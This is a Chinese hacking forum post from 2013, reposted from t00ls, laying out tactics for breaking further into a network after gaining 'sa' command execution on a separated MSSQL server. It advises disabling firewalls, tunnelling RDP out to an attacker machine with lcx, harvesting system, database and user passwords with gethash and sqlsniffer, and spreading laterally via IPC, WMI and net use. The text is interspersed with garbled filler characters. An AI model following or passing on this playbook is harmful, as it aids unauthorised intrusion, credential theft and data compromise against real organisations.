当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
# ]4 S0 v8 h& r! R8 {) ?! [3 i" m7 w0 N% o: |
; t0 I7 t9 r' h5 u& i* f, A4 B- `3 o, @: `( l
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)4 S7 l( }8 y* D, a
w1 |/ Y) K" G
9 b3 o. Q8 t0 T* N k一、DB机有公网IP.
0 w* ~; C' U' L0 [7 Q
! n M& `8 ~# w1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.( L# s" s7 j+ h" R9 G$ x7 p
3 K9 N" ~$ ], `) y
} X5 _( `- |0 P
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
4 O1 Q6 @ h& e, U! k: ]
7 b9 Y* \+ C- j0 _
/ h) }! v& b) W m1 t3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com, v7 G) _) E) |
+ |" z* S2 J/ P1 L" X/ }( U
]! v7 d5 @. ]7 L4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
; V6 w6 X6 l" y6 y }0 j" W6 J/ L" P% ]3 y ^( v
# u( X# V: r* b$ Y2 l
$ V& [: p8 }. C; D; U3 U二、DB机只有内网IP
) r) Q/ B$ ]# g- D% V) R n$ I( }- i! I4 w; l' F! }
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
' x8 X" k0 _8 q2 M. w4 @- ^: f7 j( ]& |4 q f
1 J: @& R( _; O
2:停掉防火墙和IP策略再从内往外扫描.
8 q1 T1 @; |1 h( b
+ k% ~% e1 I% D, t7 [6 G0 Y; V7 M+ d
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
# {& d5 V) `" A, K% C" R/ o0 C# k% T5 ^
0 Y) }' Q# @# G7 B, N9 r$ ?
4:学会密码规律分析往往会有惊喜.+ |" a2 {1 H! E; |8 q3 r. R
6 h" f! v$ W4 J* u& g$ [4 Q( K( v' u% j9 W2 H
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
% z5 k& |3 k o
$ a; P& c( y$ ]: y# P5 \% y
7 g9 P$ i- y% ?4 k2 x2 L2 a有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对